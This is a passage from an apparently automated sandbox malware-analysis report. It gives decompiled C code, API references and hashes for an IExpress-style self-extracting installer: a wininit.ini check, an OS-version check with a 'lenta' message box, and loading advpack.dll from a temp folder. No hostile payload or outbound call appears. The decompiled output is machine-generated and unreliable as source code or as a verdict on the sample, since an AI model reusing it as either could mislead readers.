                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                        • String ID: <None>$LICENSE
                                                                        • API String ID: 2414642746-383193767
                                                                        • Opcode ID: 48751d0def6b250d4bf32361c10ebbe83bf791dbffb8e918e3ff7579db90b76b
                                                                        • Instruction ID: 8d3e9c16ae0aac068732ceb67fed223eb9d58b689dc18a62a7f14fc270a84ff6
                                                                        • Opcode Fuzzy Hash: 48751d0def6b250d4bf32361c10ebbe83bf791dbffb8e918e3ff7579db90b76b
                                                                        • Instruction Fuzzy Hash: B511B471600209ABD724EF329C09E1779ABEBD5770F10402EB981E71A1DEBDD801B621
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F324E0(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t7;
                                                                        				void* _t20;
                                                                        				long _t26;
                                                                        				signed int _t27;
                                                                        
                                                                        				_t20 = __ebx;
                                                                        				_t7 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t7 ^ _t27;
                                                                        				_t25 = 0x104;
                                                                        				_t26 = 0;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					E00F3658A( &_v268, 0x104, "wininit.ini");
                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                        					if(_t25 != 0xffffffff) {
                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                        						_lclose(_t25);
                                                                        					}
                                                                        				}
                                                                        				return E00F36CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                        			}











                                                                        0x00f324e0
                                                                        0x00f324eb
                                                                        0x00f324f2
                                                                        0x00f324f7
                                                                        0x00f32504
                                                                        0x00f3250e
                                                                        0x00f3251d
                                                                        0x00f3252c
                                                                        0x00f32541
                                                                        0x00f32546
                                                                        0x00f32553
                                                                        0x00f32555
                                                                        0x00f32555
                                                                        0x00f32546
                                                                        0x00f3256c

                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00F32506
                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00F3252C
                                                                        • _lopen.KERNEL32(?,00000040), ref: 00F3253B
                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00F3254C
                                                                        • _lclose.KERNEL32(00000000), ref: 00F32555
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                        • String ID: wininit.ini
                                                                        • API String ID: 3273605193-4206010578
                                                                        • Opcode ID: b704e4ac14373d97579a92b789ad3d5694c9a59a6bb6faa013639590bb80b3eb
                                                                        • Instruction ID: 276728ff0b5df38ef8724452d27a3ee160108d00da0abddf15bc1c4b8539bd05
                                                                        • Opcode Fuzzy Hash: b704e4ac14373d97579a92b789ad3d5694c9a59a6bb6faa013639590bb80b3eb
                                                                        • Instruction Fuzzy Hash: 7801B572A0011867C7609B669C0CEDF7B7DEB45771F000155FA89D3190DE748E45DA91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00F336EE(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _OSVERSIONINFOA _v416;
                                                                        				signed int _v420;
                                                                        				signed int _v424;
                                                                        				CHAR* _v428;
                                                                        				CHAR* _v432;
                                                                        				signed int _v436;
                                                                        				CHAR* _v440;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t72;
                                                                        				CHAR* _t77;
                                                                        				CHAR* _t91;
                                                                        				CHAR* _t94;
                                                                        				int _t97;
                                                                        				CHAR* _t98;
                                                                        				signed char _t99;
                                                                        				CHAR* _t104;
                                                                        				signed short _t107;
                                                                        				signed int _t109;
                                                                        				short _t113;
                                                                        				void* _t114;
                                                                        				signed char _t115;
                                                                        				short _t119;
                                                                        				CHAR* _t123;
                                                                        				CHAR* _t124;
                                                                        				CHAR* _t129;
                                                                        				signed int _t131;
                                                                        				signed int _t132;
                                                                        				CHAR* _t135;
                                                                        				CHAR* _t138;
                                                                        				signed int _t139;
                                                                        
                                                                        				_t72 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t72 ^ _t139;
                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                        				_t115 = __ecx;
                                                                        				_t135 = 0;
                                                                        				_v432 = __ecx;
                                                                        				_t138 = 0;
                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                        					_t133 = _v416.dwMajorVersion;
                                                                        					_t119 = 2;
                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                        					__eflags = _t77;
                                                                        					if(_t77 == 0) {
                                                                        						_t119 = 0;
                                                                        						__eflags = 1;
                                                                        						 *0xf38184 = 1;
                                                                        						 *0xf38180 = 1;
                                                                        						L13:
                                                                        						 *0xf39a40 = _t119;
                                                                        						L14:
                                                                        						__eflags =  *0xf38a34 - _t138; // 0x0
                                                                        						if(__eflags != 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						__eflags = _t115;
                                                                        						if(_t115 == 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						_v428 = _t135;
                                                                        						__eflags = _t119;
                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                        						_t11 =  &_v420;
                                                                        						 *_t11 = _v420 & _t138;
                                                                        						__eflags =  *_t11;
                                                                        						_v440 = _t115;
                                                                        						do {
                                                                        							_v424 = _t135 * 0x18;
                                                                        							_v436 = E00F32A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                        							_t91 = E00F32A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                        							_t123 = _v436;
                                                                        							_t133 = 0x54d;
                                                                        							__eflags = _t123;
                                                                        							if(_t123 < 0) {
                                                                        								L32:
                                                                        								__eflags = _v420 - 1;
                                                                        								if(_v420 == 1) {
                                                                        									_t138 = 0x54c;
                                                                        									L36:
                                                                        									__eflags = _t138;
                                                                        									if(_t138 != 0) {
                                                                        										L40:
                                                                        										__eflags = _t138 - _t133;
                                                                        										if(_t138 == _t133) {
                                                                        											L30:
                                                                        											_v420 = _v420 & 0x00000000;
                                                                        											_t115 = 0;
                                                                        											_v436 = _v436 & 0x00000000;
                                                                        											__eflags = _t138 - _t133;
                                                                        											_t133 = _v432;
                                                                        											if(__eflags != 0) {
                                                                        												_t124 = _v440;
                                                                        											} else {
                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                        												_v420 =  &_v268;
                                                                        											}
                                                                        											__eflags = _t124;
                                                                        											if(_t124 == 0) {
                                                                        												_t135 = _v436;
                                                                        											} else {
                                                                        												_t99 = _t124[0x30];
                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                        												__eflags = _t99 & 0x00000001;
                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                        													asm("sbb ebx, ebx");
                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                        												} else {
                                                                        													_t115 = 0x104;
                                                                        												}
                                                                        											}
                                                                        											__eflags =  *0xf38a38 & 0x00000001;
                                                                        											if(( *0xf38a38 & 0x00000001) != 0) {
                                                                        												L64:
                                                                        												_push(0);
                                                                        												_push(0x30);
                                                                        												_push(_v420);
                                                                        												_push("lenta");
                                                                        												goto L65;
                                                                        											} else {
                                                                        												__eflags = _t135;
                                                                        												if(_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												__eflags =  *_t135;
                                                                        												if( *_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												MessageBeep(0);
                                                                        												_t94 = E00F3681F(_t115);
                                                                        												__eflags = _t94;
                                                                        												if(_t94 == 0) {
                                                                        													L57:
                                                                        													0x180030 = 0x30;
                                                                        													L58:
                                                                        													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                        													__eflags = _t115 & 0x00000004;
                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                        														__eflags = _t115 & 0x00000001;
                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                        															goto L66;
                                                                        														}
                                                                        														__eflags = _t97 - 1;
                                                                        														L62:
                                                                        														if(__eflags == 0) {
                                                                        															_t138 = 0;
                                                                        														}
                                                                        														goto L66;
                                                                        													}
                                                                        													__eflags = _t97 - 6;
                                                                        													goto L62;
                                                                        												}
                                                                        												_t98 = E00F367C9(_t124, _t124);
                                                                        												__eflags = _t98;
                                                                        												if(_t98 == 0) {
                                                                        													goto L57;
                                                                        												}
                                                                        												goto L58;
                                                                        											}
                                                                        										}
                                                                        										__eflags = _t138 - 0x54c;
                                                                        										if(_t138 == 0x54c) {
                                                                        											goto L30;
                                                                        										}
                                                                        										__eflags = _t138;
                                                                        										if(_t138 == 0) {
                                                                        											goto L66;
                                                                        										}
                                                                        										_t135 = 0;
                                                                        										__eflags = 0;
                                                                        										goto L44;
                                                                        									}
                                                                        									L37:
                                                                        									_t129 = _v432;
                                                                        									__eflags = _t129[0x7c];
                                                                        									if(_t129[0x7c] == 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t133 =  &_v268;
                                                                        									_t104 = E00F328E8(_t129,  &_v268, _t129,  &_v428);
                                                                        									__eflags = _t104;
                                                                        									if(_t104 != 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t135 = _v428;
                                                                        									_t133 = 0x54d;
                                                                        									_t138 = 0x54d;
                                                                        									goto L40;
                                                                        								}
                                                                        								goto L33;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							if(_t91 > 0) {
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _t123;
                                                                        							if(_t123 != 0) {
                                                                        								__eflags = _t91;
                                                                        								if(_t91 != 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                        								L27:
                                                                        								if(__eflags <= 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								L28:
                                                                        								__eflags = _t135;
                                                                        								if(_t135 == 0) {
                                                                        									goto L33;
                                                                        								}
                                                                        								_t138 = 0x54c;
                                                                        								goto L30;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							_t107 = _v416.dwBuildNumber;
                                                                        							if(_t91 != 0) {
                                                                        								_t131 = _v424;
                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                        									goto L37;
                                                                        								}
                                                                        								goto L28;
                                                                        							}
                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                        							_t109 = _v424;
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                        								goto L28;
                                                                        							}
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                        							goto L27;
                                                                        							L33:
                                                                        							_t135 =  &(_t135[1]);
                                                                        							_v428 = _t135;
                                                                        							_v420 = _t135;
                                                                        							__eflags = _t135 - 2;
                                                                        						} while (_t135 < 2);
                                                                        						goto L36;
                                                                        					}
                                                                        					__eflags = _t77 == 1;
                                                                        					if(_t77 == 1) {
                                                                        						 *0xf39a40 = _t119;
                                                                        						 *0xf38184 = 1;
                                                                        						 *0xf38180 = 1;
                                                                        						__eflags = _t133 - 3;
                                                                        						if(_t133 > 3) {
                                                                        							__eflags = _t133 - 5;
                                                                        							if(_t133 < 5) {
                                                                        								goto L14;
                                                                        							}
                                                                        							_t113 = 3;
                                                                        							_t119 = _t113;
                                                                        							goto L13;
                                                                        						}
                                                                        						_t119 = 1;
                                                                        						_t114 = 3;
                                                                        						 *0xf39a40 = 1;
                                                                        						__eflags = _t133 - _t114;
                                                                        						if(__eflags < 0) {
                                                                        							L9:
                                                                        							 *0xf38184 = _t135;
                                                                        							 *0xf38180 = _t135;
                                                                        							goto L14;
                                                                        						}
                                                                        						if(__eflags != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                        							goto L14;
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					_t138 = 0x4ca;
                                                                        					goto L44;
                                                                        				} else {
                                                                        					_t138 = 0x4b4;
                                                                        					L44:
                                                                        					_push(_t135);
                                                                        					_push(0x10);
                                                                        					_push(_t135);
                                                                        					_push(_t135);
                                                                        					L65:
                                                                        					_t133 = _t138;
                                                                        					E00F344B9(0, _t138);
                                                                        					L66:
                                                                        					return E00F36CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                        				}
                                                                        			}





































                                                                        0x00f336f9
                                                                        0x00f33700
                                                                        0x00f3370c
                                                                        0x00f33716
                                                                        0x00f33718
                                                                        0x00f3371b
                                                                        0x00f33721
                                                                        0x00f3372b
                                                                        0x00f3373d
                                                                        0x00f33745
                                                                        0x00f33746
                                                                        0x00f33746
                                                                        0x00f33749
                                                                        0x00f337ab
                                                                        0x00f337ad
                                                                        0x00f337ae
                                                                        0x00f337b3
                                                                        0x00f337b8
                                                                        0x00f337b8
                                                                        0x00f337bf
                                                                        0x00f337bf
                                                                        0x00f337c5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f337cb
                                                                        0x00f337cd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f337d5
                                                                        0x00f337db
                                                                        0x00f337e8
                                                                        0x00f337ea
                                                                        0x00f337ea
                                                                        0x00f337ea
                                                                        0x00f337f0
                                                                        0x00f337f6
                                                                        0x00f33805
                                                                        0x00f33817
                                                                        0x00f3382b
                                                                        0x00f33830
                                                                        0x00f33836
                                                                        0x00f3383b
                                                                        0x00f3383d
                                                                        0x00f338eb
                                                                        0x00f338eb
                                                                        0x00f338f2
                                                                        0x00f3390c
                                                                        0x00f33911
                                                                        0x00f33911
                                                                        0x00f33913
                                                                        0x00f3394d
                                                                        0x00f3394d
                                                                        0x00f3394f
                                                                        0x00f338a9
                                                                        0x00f338a9
                                                                        0x00f338b0
                                                                        0x00f338b2
                                                                        0x00f338b9
                                                                        0x00f338bb
                                                                        0x00f338c1
                                                                        0x00f33975
                                                                        0x00f338c7
                                                                        0x00f338de
                                                                        0x00f338e0
                                                                        0x00f338e0
                                                                        0x00f3397b
                                                                        0x00f3397d
                                                                        0x00f339a9
                                                                        0x00f3397f
                                                                        0x00f33982
                                                                        0x00f3398b
                                                                        0x00f3398d
                                                                        0x00f3398f
                                                                        0x00f3399f
                                                                        0x00f339a1
                                                                        0x00f33991
                                                                        0x00f33991
                                                                        0x00f33991
                                                                        0x00f3398f
                                                                        0x00f339af
                                                                        0x00f339b6
                                                                        0x00f33a0f
                                                                        0x00f33a0f
                                                                        0x00f33a11
                                                                        0x00f33a13
                                                                        0x00f33a19
                                                                        0x00000000
                                                                        0x00f339b8
                                                                        0x00f339b8
                                                                        0x00f339ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f339bc
                                                                        0x00f339bf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f339c3
                                                                        0x00f339c9
                                                                        0x00f339ce
                                                                        0x00f339d0
                                                                        0x00f339e3
                                                                        0x00f339e5
                                                                        0x00f339e6
                                                                        0x00f339f1
                                                                        0x00f339f7
                                                                        0x00f339fa
                                                                        0x00f33a01
                                                                        0x00f33a04
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33a06
                                                                        0x00f33a09
                                                                        0x00f33a09
                                                                        0x00f33a0b
                                                                        0x00f33a0b
                                                                        0x00000000
                                                                        0x00f33a09
                                                                        0x00f339fc
                                                                        0x00000000
                                                                        0x00f339fc
                                                                        0x00f339d3
                                                                        0x00f339d8
                                                                        0x00f339da
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f339dc
                                                                        0x00f339b6
                                                                        0x00f33955
                                                                        0x00f3395b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33961
                                                                        0x00f33963
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33969
                                                                        0x00f33969
                                                                        0x00000000
                                                                        0x00f33969
                                                                        0x00f33915
                                                                        0x00f33915
                                                                        0x00f3391b
                                                                        0x00f3391f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3392d
                                                                        0x00f33933
                                                                        0x00f33938
                                                                        0x00f3393a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33940
                                                                        0x00f33946
                                                                        0x00f3394b
                                                                        0x00000000
                                                                        0x00f3394b
                                                                        0x00000000
                                                                        0x00f338f2
                                                                        0x00f33843
                                                                        0x00f33845
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3384b
                                                                        0x00f3384d
                                                                        0x00f33883
                                                                        0x00f33885
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3389a
                                                                        0x00f3389e
                                                                        0x00f3389e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f338a0
                                                                        0x00f338a0
                                                                        0x00f338a2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f338a4
                                                                        0x00000000
                                                                        0x00f338a4
                                                                        0x00f3384f
                                                                        0x00f33851
                                                                        0x00f33857
                                                                        0x00f3386e
                                                                        0x00f33877
                                                                        0x00f3387b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33881
                                                                        0x00f33859
                                                                        0x00f3385c
                                                                        0x00f33862
                                                                        0x00f33866
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33868
                                                                        0x00000000
                                                                        0x00f338f4
                                                                        0x00f338f4
                                                                        0x00f338f5
                                                                        0x00f338fb
                                                                        0x00f33901
                                                                        0x00f33901
                                                                        0x00000000
                                                                        0x00f3390a
                                                                        0x00f3374b
                                                                        0x00f3374e
                                                                        0x00f3375c
                                                                        0x00f33764
                                                                        0x00f33769
                                                                        0x00f3376e
                                                                        0x00f33771
                                                                        0x00f3379c
                                                                        0x00f3379f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f337a3
                                                                        0x00f337a4
                                                                        0x00000000
                                                                        0x00f337a4
                                                                        0x00f33773
                                                                        0x00f33777
                                                                        0x00f33778
                                                                        0x00f3377f
                                                                        0x00f33781
                                                                        0x00f3378e
                                                                        0x00f3378e
                                                                        0x00f33794
                                                                        0x00000000
                                                                        0x00f33794
                                                                        0x00f33783
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33785
                                                                        0x00f3378c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3378c
                                                                        0x00f33750
                                                                        0x00000000
                                                                        0x00f3372d
                                                                        0x00f3372d
                                                                        0x00f3396b
                                                                        0x00f3396b
                                                                        0x00f3396c
                                                                        0x00f3396e
                                                                        0x00f3396f
                                                                        0x00f33a1e
                                                                        0x00f33a1e
                                                                        0x00f33a22
                                                                        0x00f33a27
                                                                        0x00f33a3e
                                                                        0x00f33a3e

                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00F33723
                                                                        • MessageBeep.USER32(00000000), ref: 00F339C3
                                                                        • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 00F339F1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Message$BeepVersion
                                                                        • String ID: 3$lenta
                                                                        • API String ID: 2519184315-4216304122
                                                                        • Opcode ID: 222fc4df22aa049b28be34b9cee47756055c93810ef9f872ac3e15f06cadde51
                                                                        • Instruction ID: 54c7b949023c27d4679f8301858a043e199bb5daab8cb716f789737a87fe64dd
                                                                        • Opcode Fuzzy Hash: 222fc4df22aa049b28be34b9cee47756055c93810ef9f872ac3e15f06cadde51
                                                                        • Instruction Fuzzy Hash: FB91F472E062249BDB34CF15CC817AA77B2AB45334F1501A9E889DB251DB788F81FF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E00F36495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				signed int _t9;
                                                                        				signed char _t14;
                                                                        				struct HINSTANCE__* _t15;
                                                                        				void* _t18;
                                                                        				CHAR* _t26;
                                                                        				void* _t27;
                                                                        				signed int _t28;
                                                                        
                                                                        				_t27 = __esi;
                                                                        				_t18 = __ebx;
                                                                        				_t9 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t9 ^ _t28;
                                                                        				_push(__ecx);
                                                                        				E00F31781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        				_t26 = "advpack.dll";
                                                                        				E00F3658A( &_v268, 0x104, _t26);
                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                        					_t15 = LoadLibraryA(_t26);
                                                                        				} else {
                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                        				}
                                                                        				return E00F36CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                        			}













                                                                        0x00f36495
                                                                        0x00f36495
                                                                        0x00f364a0
                                                                        0x00f364a7
                                                                        0x00f364ab
                                                                        0x00f364bd
                                                                        0x00f364c2
                                                                        0x00f364d3
                                                                        0x00f364df
                                                                        0x00f364e8
                                                                        0x00f36502
                                                                        0x00f364ee
                                                                        0x00f364f9
                                                                        0x00f364f9
                                                                        0x00f36516

                                                                        APIs
                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F364DF
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F364F9
                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F36502
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$AttributesFile
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                        • API String ID: 438848745-3290281839
                                                                        • Opcode ID: ae1ae87f614d74484e9d52b8766177dc65a835616d7fe9f0f1fc196b3d9dd65e
                                                                        • Instruction ID: 7df1fe2293d93704fb39c9f2348da5c1864f142df02b44ab1bf1e567bc56c63b
                                                                        • Opcode Fuzzy Hash: ae1ae87f614d74484e9d52b8766177dc65a835616d7fe9f0f1fc196b3d9dd65e
                                                                        • Instruction Fuzzy Hash: D0012170A00108ABDB54EB60DC49AEE7739EB50330F4001A5F485E21C0DFB49E8AAA11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F328E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                        				void* _v8;
                                                                        				char* _v12;
                                                                        				intOrPtr _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				int _v28;
                                                                        				int _v32;
                                                                        				void* _v36;
                                                                        				int _v40;
                                                                        				void* _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				intOrPtr _v56;
                                                                        				intOrPtr _v60;
                                                                        				intOrPtr _v64;
                                                                        				long _t68;
                                                                        				void* _t70;
                                                                        				void* _t73;
                                                                        				void* _t79;
                                                                        				void* _t83;
                                                                        				void* _t87;
                                                                        				void* _t88;
                                                                        				intOrPtr _t93;
                                                                        				intOrPtr _t97;
                                                                        				intOrPtr _t99;
                                                                        				int _t101;
                                                                        				void* _t103;
                                                                        				void* _t106;
                                                                        				void* _t109;
                                                                        				void* _t110;
                                                                        
                                                                        				_v12 = __edx;
                                                                        				_t99 = __ecx;
                                                                        				_t106 = 0;
                                                                        				_v16 = __ecx;
                                                                        				_t87 = 0;
                                                                        				_t103 = 0;
                                                                        				_v20 = 0;
                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                        					L19:
                                                                        					_t106 = 1;
                                                                        				} else {
                                                                        					_t62 = 0;
                                                                        					_v8 = 0;
                                                                        					while(1) {
                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                        						if(E00F32773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                        							goto L20;
                                                                        						}
                                                                        						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                        						_v28 = _t68;
                                                                        						if(_t68 == 0) {
                                                                        							_t99 = _v16;
                                                                        							_t70 = _v8 + _t99;
                                                                        							_t93 = _v24;
                                                                        							_t87 = _v20;
                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                        								goto L18;
                                                                        							}
                                                                        						} else {
                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                        							if(_t103 != 0) {
                                                                        								_t73 = GlobalLock(_t103);
                                                                        								_v36 = _t73;
                                                                        								if(_t73 != 0) {
                                                                        									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                        										L15:
                                                                        										GlobalUnlock(_t103);
                                                                        										_t99 = _v16;
                                                                        										L18:
                                                                        										_t87 = _t87 + 1;
                                                                        										_t62 = _v8 + 0x3c;
                                                                        										_v20 = _t87;
                                                                        										_v8 = _v8 + 0x3c;
                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                        											continue;
                                                                        										} else {
                                                                        											goto L19;
                                                                        										}
                                                                        									} else {
                                                                        										_t79 = _v44;
                                                                        										_t88 = _t106;
                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                        										_t101 = _v28;
                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                        										_t97 = _v48;
                                                                        										_v36 = _t83;
                                                                        										_t109 = _t83;
                                                                        										do {
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00F32A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00F32A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                        											_t109 = _t109 + 0x18;
                                                                        											_t88 = _t88 + 4;
                                                                        										} while (_t88 < 8);
                                                                        										_t87 = _v20;
                                                                        										_t106 = 0;
